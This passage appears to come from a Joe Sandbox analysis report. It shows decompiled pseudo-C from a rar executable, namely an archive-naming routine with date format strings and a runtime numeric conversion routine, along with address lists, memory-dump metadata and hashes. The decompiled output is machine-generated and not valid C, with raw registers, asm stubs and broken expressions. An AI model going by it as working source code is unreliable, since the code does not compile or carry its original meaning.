				if ( *((intOrPtr*)(_t429 + 0xe0 + _t347 * 2)) != 0) goto 0x50b43f66;
				dil =  *((intOrPtr*)(_t431 + 0x20));
				_t427 =  &(_t426[2]);
				goto 0x50b43fec;
				if (_t117 >= 0) goto 0x50b43f97;
				dil =  *((intOrPtr*)(_t431 + 0x20));
				goto 0x50b43fba;
				goto 0x50b43f90;
				_t198 =  *_t427 & 0x0000ffff;
				 *(_t429 + 0xe0 + _t347 * 2) = _t198;
				if (_t198 != 0x3a) goto 0x50b43fc2;
				 *(_t429 + 0xe0 + _t347 * 2) = 0x5f;
				_t343 = _t347 + 1 + _t347 + 1;
				if (_t343 - 0x100 >= 0) goto 0x50b440be;
				 *((short*)(_t429 + _t343 + 0xe0)) = 0;
				goto 0x50b43fec;
				dil =  *_t427 == 0x7b;
				 *((intOrPtr*)(_t431 + 0x20)) = dil;
				if (_t427[1] != 0) goto 0x50b43e83;
				r13d = 0;
				if ( *((intOrPtr*)(_t431 + 0x21)) == r13b) goto 0x50b44075;
				E00007FF67FF650B43538(E00007FF67FF650B44354(_t343, _t347 + 1,  *((intOrPtr*)(_t431 + 0x28)), _t429 + 0x1e0,  &(_t427[1]), _t429, _t458), _t429 + 0x1e0, _t458, _t458);
				E00007FF67FF650B4511C(E00007FF67FF650B5A368(_t343, _t429 + 0x1e0, _t458), _t343,  *((intOrPtr*)(_t431 + 0x28)));
				E00007FF67FF650B5A368(_t343, _t429 + 0x1e0, _t458);
				E00007FF67FF650B5A390(_t462, _t429 + 0x1e0,  *((intOrPtr*)(_t431 + 0x40)));
				goto 0x50b44089;
				E00007FF67FF650B5A368(_t343, _t462,  *((intOrPtr*)(_t431 + 0x40)));
				return E00007FF67FF650B69D10(E00007FF67FF650B5A368(_t343, _t462,  *((intOrPtr*)(_t431 + 0x40))), 0,  *(_t429 + 0x21e0) ^ _t431);
			}













































                                                                                                            0x7ff650b43a18
                                                                                                            0x7ff650b43a25
                                                                                                            0x7ff650b43a32
                                                                                                            0x7ff650b43a37
                                                                                                            0x7ff650b43a3a
                                                                                                            0x7ff650b43a44
                                                                                                            0x7ff650b43a52
                                                                                                            0x7ff650b43a58
                                                                                                            0x7ff650b43a61
                                                                                                            0x7ff650b43a64
                                                                                                            0x7ff650b43a69
                                                                                                            0x7ff650b43a6e
                                                                                                            0x7ff650b43a73
                                                                                                            0x7ff650b43a7c
                                                                                                            0x7ff650b43a83
                                                                                                            0x7ff650b43a8c
                                                                                                            0x7ff650b43a9a
                                                                                                            0x7ff650b43aa4
                                                                                                            0x7ff650b43aa8
                                                                                                            0x7ff650b43aad
                                                                                                            0x7ff650b43ab3
                                                                                                            0x7ff650b43ab6
                                                                                                            0x7ff650b43ac4
                                                                                                            0x7ff650b43ad2
                                                                                                            0x7ff650b43adc
                                                                                                            0x7ff650b43ae3
                                                                                                            0x7ff650b43aed
                                                                                                            0x7ff650b43af4
                                                                                                            0x7ff650b43afc
                                                                                                            0x7ff650b43afe
                                                                                                            0x7ff650b43b0a
                                                                                                            0x7ff650b43b0d
                                                                                                            0x7ff650b43b16
                                                                                                            0x7ff650b43b22
                                                                                                            0x7ff650b43b36
                                                                                                            0x7ff650b43b3e
                                                                                                            0x7ff650b43b44
                                                                                                            0x7ff650b43b4c
                                                                                                            0x7ff650b43b54
                                                                                                            0x7ff650b43b59
                                                                                                            0x7ff650b43b5d
                                                                                                            0x7ff650b43b62
                                                                                                            0x7ff650b43b6b
                                                                                                            0x7ff650b43b70
                                                                                                            0x7ff650b43b7b
                                                                                                            0x7ff650b43b80
                                                                                                            0x7ff650b43b8a
                                                                                                            0x7ff650b43b8d
                                                                                                            0x7ff650b43b99
                                                                                                            0x7ff650b43b9e
                                                                                                            0x7ff650b43baa
                                                                                                            0x7ff650b43bb2
                                                                                                            0x7ff650b43bb4
                                                                                                            0x7ff650b43bbf
                                                                                                            0x7ff650b43bc7
                                                                                                            0x7ff650b43bce
                                                                                                            0x7ff650b43bdd
                                                                                                            0x7ff650b43be6
                                                                                                            0x7ff650b43bf5
                                                                                                            0x7ff650b43bfd
                                                                                                            0x7ff650b43c0d
                                                                                                            0x7ff650b43c13
                                                                                                            0x7ff650b43c17
                                                                                                            0x7ff650b43c1b
                                                                                                            0x7ff650b43c20
                                                                                                            0x7ff650b43c23
                                                                                                            0x7ff650b43c26
                                                                                                            0x7ff650b43c34
                                                                                                            0x7ff650b43c38
                                                                                                            0x7ff650b43c40
                                                                                                            0x7ff650b43c4d
                                                                                                            0x7ff650b43c52
                                                                                                            0x7ff650b43c5a
                                                                                                            0x7ff650b43c60
                                                                                                            0x7ff650b43c65
                                                                                                            0x7ff650b43c71
                                                                                                            0x7ff650b43c7e
                                                                                                            0x7ff650b43c85
                                                                                                            0x7ff650b43c90
                                                                                                            0x7ff650b43c95
                                                                                                            0x7ff650b43c97
                                                                                                            0x7ff650b43ca4
                                                                                                            0x7ff650b43ca7
                                                                                                            0x7ff650b43caa
                                                                                                            0x7ff650b43caf
                                                                                                            0x7ff650b43cc5
                                                                                                            0x7ff650b43cc8
                                                                                                            0x7ff650b43cca
                                                                                                            0x7ff650b43ccf
                                                                                                            0x7ff650b43cd7
                                                                                                            0x7ff650b43cde
                                                                                                            0x7ff650b43cea
                                                                                                            0x7ff650b43cef
                                                                                                            0x7ff650b43d11
                                                                                                            0x7ff650b43d13
                                                                                                            0x7ff650b43d18
                                                                                                            0x7ff650b43d28
                                                                                                            0x7ff650b43d2d
                                                                                                            0x7ff650b43d3d
                                                                                                            0x7ff650b43d42
                                                                                                            0x7ff650b43d52
                                                                                                            0x7ff650b43d57
                                                                                                            0x7ff650b43d67
                                                                                                            0x7ff650b43d6c
                                                                                                            0x7ff650b43d7c
                                                                                                            0x7ff650b43d8b
                                                                                                            0x7ff650b43d97
                                                                                                            0x7ff650b43d9d
                                                                                                            0x7ff650b43da0
                                                                                                            0x7ff650b43da5
                                                                                                            0x7ff650b43db4
                                                                                                            0x7ff650b43db9
                                                                                                            0x7ff650b43dc5
                                                                                                            0x7ff650b43dcc
                                                                                                            0x7ff650b43dd1
                                                                                                            0x7ff650b43ddf
                                                                                                            0x7ff650b43de8
                                                                                                            0x7ff650b43df1
                                                                                                            0x7ff650b43df4
                                                                                                            0x7ff650b43dfe
                                                                                                            0x7ff650b43e03
                                                                                                            0x7ff650b43e0a
                                                                                                            0x7ff650b43e0c
                                                                                                            0x7ff650b43e19
                                                                                                            0x7ff650b43e1d
                                                                                                            0x7ff650b43e22
                                                                                                            0x7ff650b43e2c
                                                                                                            0x7ff650b43e34
                                                                                                            0x7ff650b43e39
                                                                                                            0x7ff650b43e3c
                                                                                                            0x7ff650b43e40
                                                                                                            0x7ff650b43e53
                                                                                                            0x7ff650b43e59
                                                                                                            0x7ff650b43e61
                                                                                                            0x7ff650b43e64
                                                                                                            0x7ff650b43e69
                                                                                                            0x7ff650b43e6f
                                                                                                            0x7ff650b43e75
                                                                                                            0x7ff650b43e87
                                                                                                            0x7ff650b43e9c
                                                                                                            0x7ff650b43ea5
                                                                                                            0x7ff650b43eb3
                                                                                                            0x7ff650b43ebd
                                                                                                            0x7ff650b43ec6
                                                                                                            0x7ff650b43ede
                                                                                                            0x7ff650b43ee5
                                                                                                            0x7ff650b43ef0
                                                                                                            0x7ff650b43ef5
                                                                                                            0x7ff650b43eff
                                                                                                            0x7ff650b43f03
                                                                                                            0x7ff650b43f05
                                                                                                            0x7ff650b43f0d
                                                                                                            0x7ff650b43f12
                                                                                                            0x7ff650b43f19
                                                                                                            0x7ff650b43f21
                                                                                                            0x7ff650b43f28
                                                                                                            0x7ff650b43f30
                                                                                                            0x7ff650b43f36
                                                                                                            0x7ff650b43f3e
                                                                                                            0x7ff650b43f54
                                                                                                            0x7ff650b43f66
                                                                                                            0x7ff650b43f6d
                                                                                                            0x7ff650b43f6f
                                                                                                            0x7ff650b43f7c
                                                                                                            0x7ff650b43f80
                                                                                                            0x7ff650b43f8b
                                                                                                            0x7ff650b43f90
                                                                                                            0x7ff650b43f95
                                                                                                            0x7ff650b43fa2
                                                                                                            0x7ff650b43fa4
                                                                                                            0x7ff650b43fa7
                                                                                                            0x7ff650b43fb3
                                                                                                            0x7ff650b43fba
                                                                                                            0x7ff650b43fc5
                                                                                                            0x7ff650b43fcf
                                                                                                            0x7ff650b43fd5
                                                                                                            0x7ff650b43fdd
                                                                                                            0x7ff650b43fe3
                                                                                                            0x7ff650b43fe7
                                                                                                            0x7ff650b43ffb
                                                                                                            0x7ff650b44001
                                                                                                            0x7ff650b4400c
                                                                                                            0x7ff650b44027
                                                                                                            0x7ff650b44045
                                                                                                            0x7ff650b44057
                                                                                                            0x7ff650b4406e
                                                                                                            0x7ff650b44073
                                                                                                            0x7ff650b44084
                                                                                                            0x7ff650b440bd

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: sprintf
                                                                                                            • String ID: %02u$%02u$%02u$%02u$%02u$%02u$%03u$%04u$%05u$.rar$YMDHISWAEN$yyyymmddhhmmss
                                                                                                            • API String ID: 590974362-3282778304
                                                                                                            • Opcode ID: 70323d13f3568e394f302658a1e44ad8db4bb8149fcdb150452d1f06746614cc
                                                                                                            • Instruction ID: 942b957a2330eb6d5502daff9ad00aab034972a643845864ba07c764eccc456b
                                                                                                            • Opcode Fuzzy Hash: 70323d13f3568e394f302658a1e44ad8db4bb8149fcdb150452d1f06746614cc
                                                                                                            • Instruction Fuzzy Hash: 1A22D562A08683B5EB209B64D4C02FD2761FF56788F480235EA8FA7795EF7ED645C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7B030 Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODECrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 81%
                                                                                                            			E00007FF67FF650B7B030(signed int __ecx, signed int __edx, signed long long __rcx, signed int* __r8, signed int __r9, signed int __r10, signed long long __r11) {
				void* __rbx;
				void* __rsi;
				void* _t529;
				void* _t547;
				void* _t555;
				void* _t586;
				signed long long _t591;
				intOrPtr _t597;
				void* _t603;
				void* _t619;
				signed int _t626;
				signed long long _t631;
				intOrPtr _t637;
				void* _t643;
				void* _t659;
				signed int _t666;
				void* _t677;
				void* _t696;
				signed int _t697;
				signed int _t698;
				intOrPtr _t703;
				signed long long _t707;
				signed int _t712;
				signed char _t713;
				signed long long _t737;
				signed int _t750;
				intOrPtr _t760;
				signed int _t761;
				signed long long _t767;
				signed long long _t773;
				signed long long _t778;
				intOrPtr _t803;
				signed long long _t816;
				void* _t818;
				signed long long _t831;
				void* _t832;
				intOrPtr _t837;
				signed int _t850;
				signed int _t852;
				signed int _t853;
				void* _t858;
				void* _t864;
				void* _t898;
				void* _t904;
				signed long long _t1026;
				signed long long _t1036;
				void* _t1038;
				signed long long _t1040;
				signed long long _t1041;
				signed long long _t1046;
				signed long long _t1047;
				signed long long _t1048;
				signed long long _t1051;
				void* _t1058;
				intOrPtr* _t1059;
				signed long long _t1065;
				void* _t1068;
				signed long long _t1075;
				signed long long _t1079;
				signed long long _t1080;
				signed long long _t1089;
				signed long long _t1093;
				void* _t1105;
				signed long long _t1114;
				signed long long _t1115;
				signed long long _t1122;
				long long _t1137;
				signed long long _t1147;
				void* _t1148;
				signed long long _t1153;
				void* _t1155;
				signed long long _t1156;
				signed long long _t1157;
				char* _t1161;
				void* _t1162;
				void* _t1163;
				signed long long _t1164;
				signed long long _t1169;
				signed long long _t1170;
				signed long long _t1171;
				signed long long _t1180;
				signed long long _t1183;
				signed long long _t1184;
				signed long long _t1193;
				signed long long _t1196;
				signed long long _t1197;
				signed long long _t1210;
				signed int _t1215;
				signed long long _t1218;
				signed long long _t1220;
				signed long long _t1221;
				unsigned long long _t1232;

				_t1221 = __r11;
				_t1215 = __r9;
				_t1162 = _t1163 - 0x6d8;
				_t1164 = _t1163 - 0x7d8;
				_t1026 =  *0x50b978f0; // 0x27db226282f1
				 *(_t1162 + 0x6c0) = _t1026 ^ _t1164;
				 *(_t1164 + 0x38) = __rcx;
				 *((long long*)(_t1164 + 0x50)) = __r9;
				 *((long long*)(_t1164 + 0x70)) = __r8;
				E00007FF67FF650B7CEEC(_t1164 + 0x60);
				r13d = 0;
				if (( *(_t1164 + 0x60) & 0x0000001f) != 0x1f) goto 0x50b7b093;
				 *((intOrPtr*)(_t1164 + 0x68)) = r13b;
				goto 0x50b7b0a2;
				E00007FF67FF650B7CF58(( *(_t1164 + 0x60) & 0x0000001f) - 0x1f, _t1164 + 0x60);
				 *((char*)(_t1164 + 0x68)) = 1;
				_t1040 =  *(_t1164 + 0x38);
				__r8[2] = __r9;
				asm("sbb ecx, ecx");
				_t712 = (__ecx & 0x0000000d) + 0x20;
				 *__r8 = _t712;
				if ((0x00000000 & _t1040) != 0) goto 0x50b7b112;
				if ((0xffffffff & _t1040) != 0) goto 0x50b7b112;
				__r8[1] = r13d;
				if (E00007FF67FF650B748F4(0, __r9,  *((intOrPtr*)(_t1162 + 0x740)), 0x50b891ec) == 0) goto 0x50b7c2fe;
				goto 0x50b7c332;
				_t19 = _t1164 + 0x38; // 0x10000000000037
				_t1065 = _t19;
				_t529 = E00007FF67FF650B7586C(_t1065);
				_t858 = _t529;
				if (_t858 == 0) goto 0x50b7b128;
				__r8[1] = 1;
				if (_t858 == 0) goto 0x50b7c2e0;
				if (_t858 == 0) goto 0x50b7c2c1;
				if (_t858 == 0) goto 0x50b7c2a2;
				if (_t529 - 0xffffffffffffffff == 1) goto 0x50b7c283;
				r9d = 0x7ff;
				_t1041 = _t1040 & 0xffffffff;
				 *(_t1164 + 0x38) = _t1041;
				asm("movsd xmm0, [esp+0x38]");
				asm("movsd [esp+0x58], xmm0");
				_t1114 =  *((intOrPtr*)(_t1164 + 0x58));
				 *((intOrPtr*)(_t1164 + 0x4c)) = __edx + 1;
				_t1169 = _t1114 >> 0x34;
				_t713 = _t712 & 0xffffff00 | (__r9 & _t1169) == 0x00000000;
				asm("dec ebp");
				_t1115 = _t1114 & 0xffffffff;
				asm("sbb eax, eax");
				r8d = r8d & r9d;
				_t696 = _t1169 - 0x434 +  ~( ~_t713) + 1;
				0x50b7d070();
				E00007FF67FF650B7CFA8( ~( ~_t713) + 1, _t1169);
				asm("cvttsd2si ecx, xmm0");
				 *(_t1162 - 0x7c) = r14d;
				r10d = 1;
				asm("inc ebp");
				_t1232 = ( !__r9 & 0x00000000) + _t1115 >> 0x20;
				r12d = r12d &  ~_t713;
				 *(_t1162 - 0x78) = r14d;
				 *(_t1164 + 0x30) = r12d;
				asm("sbb edx, edx");
				_t767 =  ~__edx + r10d;
				 *(_t1162 - 0x80) = _t767;
				if (_t696 < 0) goto 0x50b7b4af;
				 *(_t1162 + 0x328) = 0x100000;
				 *((intOrPtr*)(_t1162 + 0x324)) = 0;
				 *(_t1162 + 0x320) = 0x10000000000002;
				if (_t767 != 0x10000000000002) goto 0x50b7b38a;
				r8d = r13d;
				if ( *((intOrPtr*)(_t1162 + 0x324 + _t1065 * 4)) !=  *((intOrPtr*)(_t1162 + _t1065 * 4 - 0x7c))) goto 0x50b7b38a;
				r8d = r8d + r10d;
				_t864 = r8d - 0x10000000000002;
				if (_t864 != 0) goto 0x50b7b22c;
				r11d = _t1041 + 2;
				 *(_t1164 + 0x38) = r13d;
				r9d = r11d;
				r11d = r11d & 0x0000001f;
				r9d = r9d >> 5;
				_t697 = _t696 - r10d;
				asm("inc ecx");
				r12d = _t697;
				r12d =  !r12d;
				if (_t864 == 0) goto 0x50b7b27c;
				goto 0x50b7b27f;
				_t547 = __r9 + 2;
				r15b = r11d - 0x20 - r13d > 0;
				r8b = _t547 - 0x73 > 0;
				if (_t547 != 0x73) goto 0x50b7b2a0;
				if (r15b != 0) goto 0x50b7b2a3;
				r13d = r13d | 0xffffffff;
				if (r8b != 0) goto 0x50b7b351;
				if (r13b != 0) goto 0x50b7b351;
				r14d = 0x72;
				r14d =  <  ? _t547 : r14d;
				if (r14d == r13d) goto 0x50b7b326;
				r8d = r14d;
				r8d = r8d - r9d;
				_t816 = _t1169 + __r9;
				if (_t816 - r9d < 0) goto 0x50b7b320;
				if (r8d - _t767 >= 0) goto 0x50b7b2e5;
				r10d =  *(_t1162 + _t1169 * 4 - 0x7c);
				goto 0x50b7b2e8;
				r10d = 0;
				if (_t1169 - 1 - _t767 >= 0) goto 0x50b7b2f6;
				goto 0x50b7b2f8;
				r8d = r8d + r13d;
				r10d = r10d & _t697;
				r10d = r10d << r11d;
				 *(_t1162 + _t1153 * 4 - 0x7c) = (0 & r12d) >> 0x00000020 | r10d;
				if (_t1169 + __r9 == r13d) goto 0x50b7b320;
				_t773 =  *(_t1162 - 0x80);
				goto 0x50b7b2d0;
				r10d = 1;
				r13d = 0;
				if (r9d == 0) goto 0x50b7b340;
				 *(_t1162 + 0x3fffffffffff84) = r13d;
				if (r13d + r10d != r9d) goto 0x50b7b331;
				r14d =  !=  ? _t1232 + 1 : r14d;
				 *(_t1162 - 0x80) = r14d;
				goto 0x50b7b35b;
				r13d = 0;
				r14d = r13d;
				 *(_t1162 - 0x80) = r13d;
				 *((intOrPtr*)(_t1162 + 0x154)) = 4;
				r12d =  *(_t1164 + 0x30);
				r15d = 1;
				 *(_t1162 + 0x150) = r15d;
				 *(_t1162 + 0x320) = r15d;
				 *(_t1162 + 0x328) = r13d;
				goto 0x50b7b6fe;
				 *(_t1164 + 0x38) =  *(_t1164 + 0x38) & 0x00000000;
				r11d = (__r10 << 0x20) + 1;
				r9d = r11d;
				r11d = r11d & 0x0000001f;
				r9d = r9d >> 5;
				r15d = _t816;
				r15d = r15d - r11d;
				_t698 = _t697 - r10d;
				asm("bsr eax, [ebp+eax*4-0x7c]");
				r13d = _t698;
				r13d =  !r13d;
				if (r15b == 0) goto 0x50b7b3c6;
				goto 0x50b7b3c8;
				_t555 = _t1115 + __r9;
				r12b = r11d - _t816 > 0;
				r8b = _t555 - 0x73 > 0;
				if (_t555 != 0x73) goto 0x50b7b3eb;
				if (r12b == 0) goto 0x50b7b3eb;
				goto 0x50b7b3ed;
				r10d = r10d | 0xffffffff;
				if (r8b != 0) goto 0x50b7b49a;
				if (0 != 0) goto 0x50b7b49a;
				r14d = 0x72;
				r14d =  <  ? _t555 : r14d;
				if (r14d == r10d) goto 0x50b7b470;
				r8d = r14d;
				r8d = r8d - r9d;
				_t818 = _t1169 + __r9;
				if (_t818 - r9d < 0) goto 0x50b7b470;
				if (r8d - _t773 >= 0) goto 0x50b7b42f;
				r10d =  *(_t1162 + _t1169 * 4 - 0x7c);
				goto 0x50b7b432;
				r10d = 0;
				if (_t1169 - 1 - _t773 >= 0) goto 0x50b7b440;
				goto 0x50b7b442;
				r10d = r10d & _t698;
				r10d = r10d << 0;
				r10d = r10d | (0 & r13d) >> 0;
				 *(_t1162 + _t1153 * 4 - 0x7c) = r10d;
				r10d = r10d | 0xffffffff;
				r8d = r8d + r10d;
				if (_t1169 + __r9 == r10d) goto 0x50b7b470;
				_t778 =  *(_t1162 - 0x80);
				goto 0x50b7b41a;
				r13d = 0;
				if (r9d == 0) goto 0x50b7b489;
				 *(_t1162 + 0x3fffffffffff84) = r13d;
				if (r13d + 1 != r9d) goto 0x50b7b47b;
				r14d =  !=  ? _t1232 + 1 : r14d;
				 *(_t1162 - 0x80) = r14d;
				goto 0x50b7b4a4;
				r13d = 0;
				r14d = r13d;
				 *(_t1162 - 0x80) = r13d;
				 *((intOrPtr*)(_t1162 + 0x154)) = 0x20 - r11d;
				goto 0x50b7b365;
				if (_t698 == 0xfffffc02) goto 0x50b7b5e7;
				 *(_t1162 + 0x328) = 0x100000;
				 *((intOrPtr*)(_t1162 + 0x324)) = 0;
				 *(_t1162 + 0x320) = 0x10000000000002;
				if (_t778 != 0x10000000000002) goto 0x50b7b5e7;
				r8d = r13d;
				if ( *((intOrPtr*)(_t1162 + 0x324 + _t1065 * 4)) !=  *((intOrPtr*)(_t1162 + _t1065 * 4 - 0x7c))) goto 0x50b7b5e7;
				r8d = r8d + r10d;
				_t898 = r8d - 0x10000000000002;
				if (_t898 != 0) goto 0x50b7b4e1;
				asm("inc ecx");
				 *(_t1164 + 0x38) = r13d;
				if (_t898 == 0) goto 0x50b7b50c;
				goto 0x50b7b50f;
				r9b = _t818 - r13d - 0x10000000000002 > 0;
				r13d = r13d | 0xffffffff;
				if (0x10000000000002 - _t778 >= 0) goto 0x50b7b52a;
				r8d =  *(_t1162 + 0x3fffffffffff84);
				goto 0x50b7b52d;
				r8d = 0;
				_t110 = _t1065 - 1; // 0x1
				if (_t110 - _t778 >= 0) goto 0x50b7b53a;
				goto 0x50b7b53c;
				 *(_t1162 + 0x3fffffffffff84) = 0 >> 0x0000001e ^ r8d << 0x00000002;
				if (0x10000000000002 + r13d == r13d) goto 0x50b7b55a;
				goto 0x50b7b51d;
				r9b =  ~r9b;
				asm("inc ebp");
				r14d =  ~r14d;
				r14d = r14d + 0x10000000000002;
				 *(_t1162 - 0x80) = r14d;
				_t1046 = __r10 << r15d << 2;
				_t1170 = _t1046;
				E00007FF67FF650B6C1A0(0x10000000000002, 0, _t1162 + 0x324, _t1115, _t1170);
				_t120 = _t1153 + 1; // 0x3
				r15d = _t120;
				r8d = r15d;
				_t1171 = _t1170 << 2;
				 *(_t1162 + _t1046 + 0x324) = 1 << sil;
				r13d = 0;
				 *(_t1162 + 0x150) = r15d;
				 *(_t1162 + 0x320) = r15d;
				if (_t1171 == 0) goto 0x50b7b6fe;
				_t904 = _t1171 - _t1046;
				if (_t904 > 0) goto 0x50b7b6dd;
				_t1116 = _t1162 + 0x324;
				E00007FF67FF650B6BAF0();
				goto 0x50b7b6f7;
				_t127 = _t1116 - 1; // 0x0
				 *(_t1164 + 0x38) = r13d;
				asm("bsr eax, [ebp+eax*4-0x7c]");
				if (_t904 == 0) goto 0x50b7b5fc;
				goto 0x50b7b5ff;
				r9b = (0x10000000000002 - _t698 >> 5) - r13d - r10d > 0;
				if (0 != 0x73) goto 0x50b7b61b;
				if (r9b != 0) goto 0x50b7b61e;
				r13d = r13d | 0xffffffff;
				if ((_t127 & 0xffffff00 | 0 - 0x00000073 > 0x00000000) != 0) goto 0x50b7b68e;
				if (r13b != 0) goto 0x50b7b68e;
				r14d = 0x72;
				r14d =  <  ? 0 : r14d;
				if (r14d == r13d) goto 0x50b7b67a;
				_t737 = r14d;
				if (_t737 >= 0) goto 0x50b7b64c;
				r8d =  *(_t1162 + 0x3fffffffffff84);
				goto 0x50b7b64f;
				r8d = 0;
				if (_t1162 + 0x154 - 1 >= 0) goto 0x50b7b65c;
				goto 0x50b7b65e;
				 *(_t1162 + 0x3fffffffffff84) = 0 >> 0x0000001f ^ _t1171 + _t1171;
				if (_t737 + r13d == r13d) goto 0x50b7b67a;
				goto 0x50b7b63f;
				r13d = 0;
				r14d =  !=  ? _t1232 + 1 : r14d;
				 *(_t1162 - 0x80) = r14d;
				goto 0x50b7b698;
				r13d = 0;
				r14d = r13d;
				 *(_t1162 - 0x80) = r13d;
				_t1068 = _t1162 + 0x324;
				_t1047 = _t1046 << 2;
				E00007FF67FF650B6C1A0(_t1232 + 1, 0, _t1068, _t1162 + 0x324, _t1047);
				r15d = _t1156 + 1;
				r8d = r15d;
				 *(_t1162 + _t1047 + 0x324) = 1;
				goto 0x50b7b5aa;
				E00007FF67FF650B6C1A0(1 << dil, 0, _t1068, _t1162 + 0x324, _t1047);
				_t586 = E00007FF67FF650B74DAC(0);
				 *0 = 0x22;
				E00007FF67FF650B74C8C(_t586);
				r15d =  *(_t1162 + 0x150);
				if (r12d < 0) goto 0x50b7bbca;
				_t591 = 0xcccccccd * r12d >> 0x20 >> 3;
				 *(_t1164 + 0x48) = _t591;
				r12d = _t591;
				 *(_t1164 + 0x40) = _t591;
				if (_t591 == 0) goto 0x50b7bb01;
				r13d = r12d;
				r13d =  >  ? 0x26 : r13d;
				 *(_t1164 + 0x44) = r13d;
				_t1048 = _t1047 << 2;
				 *(_t1162 + 0x320) = _t1156 + _t1068;
				E00007FF67FF650B6C1A0(_t1156 + _t1068, 0, _t1162 + 0x324, 0x7ff650b10000, _t1048);
				_t1157 = _t1156 << 2;
				E00007FF67FF650B6BAF0();
				r11d =  *(_t1162 + 0x320);
				if (r11d - 1 > 0) goto 0x50b7b85b;
				_t597 =  *((intOrPtr*)(_t1162 + 0x324));
				if (_t597 != 0) goto 0x50b7b7d2;
				r15d = 0;
				 *(_t1162 + 0x150) = r15d;
				goto 0x50b7badb;
				if (_t597 == 1) goto 0x50b7badb;
				if (r15d == 0) goto 0x50b7badb;
				r8d = 0;
				r9d = 0;
				r9d = r9d + 1;
				if (r9d != r15d) goto 0x50b7b7ed;
				if (r8d == 0) goto 0x50b7b84f;
				if ( *(_t1162 + 0x150) - 0x73 >= 0) goto 0x50b7b83e;
				 *(_t1162 + 0x40000000000154) = r8d;
				r15d =  *(_t1162 + 0x150);
				r15d = r15d + 1;
				goto 0x50b7b7c6;
				r15d = 0;
				 *(_t1162 + 0x150) = r15d;
				goto 0x50b7badd;
				r15d =  *(_t1162 + 0x150);
				goto 0x50b7badb;
				if (r15d - 1 > 0) goto 0x50b7b912;
				_t703 =  *((intOrPtr*)(_t1162 + 0x154));
				_t1180 = _t1221 << 2;
				r15d = r11d;
				 *(_t1162 + 0x150) = r11d;
				if (_t1180 == 0) goto 0x50b7b8c1;
				_t1075 = _t1162 + 0x154;
				if (_t1180 - 0 > 0) goto 0x50b7b8a0;
				E00007FF67FF650B6BAF0();
				goto 0x50b7b8ba;
				E00007FF67FF650B6C1A0(0x1cc, 0, _t1075, _t1162 + 0x324, 0);
				_t603 = E00007FF67FF650B74DAC(0);
				 *0 = 0x22;
				E00007FF67FF650B74C8C(_t603);
				r15d =  *(_t1162 + 0x150);
				if (_t703 == 0) goto 0x50b7b7c3;
				if (_t703 == 1) goto 0x50b7badb;
				if (r15d == 0) goto 0x50b7badb;
				r8d = 0;
				_t1218 = _t1048;
				r9d = 0;
				_t1183 = _t1075 * _t1218 + 0 >> 0x20;
				r9d = r9d + 1;
				if (r9d != r15d) goto 0x50b7b8e4;
				goto 0x50b7b816;
				r12d = r15d;
				_t1225 =  ==  ? _t1162 + 0x154 : _t1162 + 0x324;
				r12d =  !=  ? r11d : r12d;
				r11d =  !=  ? r15d : r11d;
				_t1079 = _t1162 + 0x324;
				_t1122 =  ==  ? _t1079 : _t1162 + 0x154;
				r15d = 0;
				r10d = 0;
				 *(_t1164 + 0x38) = _t1122;
				 *(_t1162 + 0x4f0) = r15d;
				if (r12d == 0) goto 0x50b7ba7e;
				_t850 =  *(( ==  ? _t1162 + 0x154 : _t1162 + 0x324) + _t1218 * 4);
				if (_t850 != 0) goto 0x50b7b991;
				if (r10d != r15d) goto 0x50b7ba72;
				 *(_t1162 + 0x4f4 + _t1218 * 4) =  *(_t1162 + 0x4f4 + _t1218 * 4) & _t850;
				_t221 = _t1218 + 1; // 0x1
				r15d = _t221;
				 *(_t1162 + 0x4f0) = r15d;
				goto 0x50b7ba72;
				r9d = r10d;
				if (r11d == 0) goto 0x50b7ba63;
				if (r9d == 0x73) goto 0x50b7ba11;
				if (r9d != r15d) goto 0x50b7b9ca;
				_t223 = _t1218 + 1; // 0x1
				 *(_t1162 + 0x400000000004f4) =  *(_t1162 + 0x400000000004f4) & 0x00000000;
				 *(_t1162 + 0x4f0) = _t223 + _t1153 + _t1215;
				r8d = r9d;
				r9d = r9d + 1;
				 *((intOrPtr*)(_t1162 + 0x4f4 + _t1183 * 4)) =  *((intOrPtr*)(_t1122 + 0x40000000000000));
				r15d =  *(_t1162 + 0x4f0);
				if (_t1153 + _t1215 == r11d) goto 0x50b7ba11;
				goto 0x50b7b9a4;
				if (0 == 0) goto 0x50b7ba63;
				if (r9d == 0x73) goto 0x50b7bb9d;
				if (r9d != r15d) goto 0x50b7ba39;
				 *(_t1162 + 0x400000000004f4) =  *(_t1162 + 0x400000000004f4) & 0x00000000;
				_t250 = _t1215 + 1; // 0x1
				 *(_t1162 + 0x4f0) = _t250;
				r9d = r9d + 1;
				 *((intOrPtr*)(_t1162 + 0x4f4 + _t1079 * 4)) = 0;
				r15d =  *(_t1162 + 0x4f0);
